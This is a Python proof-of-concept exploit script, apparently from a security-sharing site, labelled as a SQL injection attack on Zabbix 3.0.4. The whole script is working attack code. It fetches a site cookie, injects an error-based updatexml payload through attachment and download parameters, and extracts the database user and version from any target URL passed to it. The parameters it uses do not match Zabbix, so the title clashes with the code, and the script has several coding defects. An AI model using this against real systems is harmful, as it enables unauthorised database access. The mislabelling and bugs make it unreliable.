Zabbix V3.0.4 SQLinjection POC

Report poc
#!/usr/bin/dev python
# -*- coding:utf-8 -*-
# author: Lion Ei'Jonson
# date:2017/9/21

import sys
import requests
import re
import urllib

def useage():
    print("[*]Useage: python %s http://www.lioneijonson.cn" % sys.argv[0])

def mix_payload(url,userid):
    sql = 'updatexml(1,concat(1,(select concat(0x75736572,0x3a,user(),0x2c,0x76657273696f6e,0x3a,version()))),1)#'
    data = {'userid_flash': userid}
    payload = '&id=%*27 and ' + sql + '&m=1&modelid=2&f=test&catid=7&'
    url = url + '?m=attachment&c=attachments&a=swfupload_json&aid=1&src=' + urllib.parse.quote(payload)
    content = requests.post(url,data=data)
    for cookie in content.cookies:
        if '_att_json' in cookie.name:
            print("[*]payload is encrypt")
            attack_payload = cookie.value
    return attack_payload

def get_result(url):
    get_params = {
        'm':'content',
        'c':'down',
        'a_k':mix_payload(url,userid)
    }
    respon = requests.get(url,params=get_params)
    return respon

if __name__ == '__main__':
    if len(sys.argv) != 2:
        useage()
        sys.exit()
    if(sys.argv[1][:4]) != "http":
        url = "http://" + sys.argv[1] + "/index.php"
    else:
        url = sys.argv[1] + "/index.php"
    get_params = {
        'm':'wap',
        'c':'index',
        'siteid':'1',
    }
    try:
        content = requests.get(url,params=get_params)
    except:
        print("[!]Target is not available")
        sys.exit()
    for cookie in content.cookies:
        if '_siteid' in cookie.name:
            print("[*]Find the cookie_userid")
            userid = cookie.value
        else:
            print("[!]Can't find the cookie")
            sys.exit()
    match = re.search(r"XPATH syntax error: '(\S+)'",get_result(url).content.decode('utf-8'))
    if match:
        print("[*]The target is vulnerable")
        print(match.group(1))
    else:
        print("[!]The target is not vulnerable")
        sys.exit()